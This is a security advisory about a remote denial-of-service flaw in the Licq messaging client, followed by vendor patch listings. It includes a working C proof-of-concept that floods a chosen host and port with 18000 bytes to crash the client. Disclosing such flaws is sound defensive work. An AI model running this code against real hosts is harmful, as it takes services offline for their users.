COMMAND
licq
SYSTEMS AFFECTED
licq v.85 and v1.0.2 and possibly previous or newer versions.
PROBLEM
Stanley G. Bubrouski found following. While testing Licq back in
December it became apparent to Stan that Licq could be made to
crash consistently if a certain amount of data is sent to a port
it is listening on. Further testing showed that sending a certain
amount of data to the port the Remote Management Service (RMS)
plugin listens on it too would cause Licq to crash or lock up.
The amount of data needed to be sent to crash Licq may vary from
system to system. On the Red Hat linux 7.0 system he used 16707
or more bytes sent to the port Licq was listening on was enough
to crash it. Sending around 12000 or more characters to the RMS
plugin port was enough to crash Licq on system as well. Attached
is a simple exploit to demonstrate the DoS.
/*
* Name: Licqkill.c
* Author: Stan Bubrouski <stan@ccs.neu.edu>
* Date: December 26, 2000
* This has been tested against Licq v.85 and v1.0.2
* Purpose: Proof-of-concept tool for the Licq Denial of Service vulnerability.
*/
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
int main(int argc, char **argv)
{
char buf[18000];
int i, sock, result;
struct sockaddr_in sin;
struct hostent *hn;
printf("licqkill.c - Licq remote DoS by Stan Bubrouski <stan@ccs.neu.edu>\n\n");
if (argc < 3)
{
fprintf(stderr, "Usage: %s <host> <port>\n", argv[0]);
exit(-1);
}
hn = gethostbyname(argv[1]);
if (!hn)
{
fprintf(stderr, "%s: host lookup failure\n", argv[1]);
exit(-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
sin.sin_addr = *(struct in_addr *)hn->h_addr;
sock = socket(AF_INET, SOCK_STREAM, 0);
result = connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in));
if (result != 0)
{
fprintf(stderr, "Failed to establish connection to %s\n", argv[1]);
exit(-1);
}
if (sock < 0)
{
fprintf(stderr, "Socket error.");
exit(-1);
}
for (i=0; i<18000; i++)
strncat(buf, "A", 1);
send(sock, buf, sizeof(buf), 0);
close(sock);
fprintf(stdout, "Data sent\n\n");
}
SOLUTION
The actual problem is due to line parsing code which uses a fixed
length (dynamically allocated) buffer of 1024 bytes. Any string
of characters longer then 1024 without a newline will crash the
server. This has been fixed in the latest CVS tree which will be
released along with Licq 1.0.3 very soon.
For Mandrake Linux:
Linux-Mandrake 7.1: 7.1/RPMS/licq-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-autoreply-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-console-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-devel-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-forwarder-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-gtk-0.50.1-3.3mdk.i586.rpm
7.1/RPMS/licq-rms-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-update-hosts-1.0.3-2.2mdk.i586.rpm
7.1/SRPMS/licq-1.0.3-2.2mdk.src.rpm
7.1/SRPMS/licq-gtk-0.50.1-3.3mdk.src.rpm
Linux-Mandrake 7.2: 7.2/RPMS/licq-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-autoreply-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-console-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-devel-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-forwarder-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-rms-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-update-hosts-1.0.3-2.3mdk.i586.rpm
7.2/SRPMS/licq-1.0.3-2.3mdk.src.rpm
Corporate Server 1.0.1: 1.0.1/RPMS/licq-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-autoreply-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-console-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-devel-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-forwarder-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-gtk-0.50.1-3.3mdk.i586.rpm
1.0.1/RPMS/licq-rms-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-update-hosts-1.0.3-2.2mdk.i586.rpm
1.0.1/SRPMS/licq-1.0.3-2.2mdk.src.rpm
1.0.1/SRPMS/licq-gtk-0.50.1-3.3mdk.src.rpm
For Red Hat:
ftp://updates.redhat.com/7.0/SRPMS/licq-1.0.2-2.src.rpm
ftp://updates.redhat.com/7.0/alpha/licq-1.0.2-2.alpha.rpm
ftp://updates.redhat.com/7.0/i386/licq-1.0.2-2.i386.rpm
ftp://updates.redhat.com/powertools/6.2/SRPMS/licq-1.0.2-0.6x.1.src.rpm
ftp://updates.redhat.com/powertools/6.2/alpha/licq-1.0.2-0.6x.1.alpha.rpm
ftp://updates.redhat.com/powertools/6.2/i386/licq-1.0.2-0.6x.1.i386.rpm
ftp://updates.redhat.com/powertools/6.2/sparc/licq-1.0.2-0.6x.1.sparc.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/licq-0.61-7cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/licq-0.61-7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/licq-0.61-7cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/licq-0.61-7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/licq-0.61-7cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/licq-0.61-7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/licq-0.61-7cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/licq-0.61-7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/licq-0.75.2-10cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/licq-0.75.2-10cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/licq-1.0.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/licq-common-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/licq-devel-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/licq-plugins-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/licq-console-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/licq-qt-gui-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/licq-1.0.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/licq-common-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/licq-devel-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/licq-plugins-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/licq-console-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/licq-qt-gui-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/licq-0.75.2-10cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/licq-0.75.2-10cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/licq-0.75.2-10cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/licq-0.75.2-10cl.i386.rpm
For FreeBSD:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/licq-1.0.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/licq-1.0.3.tgz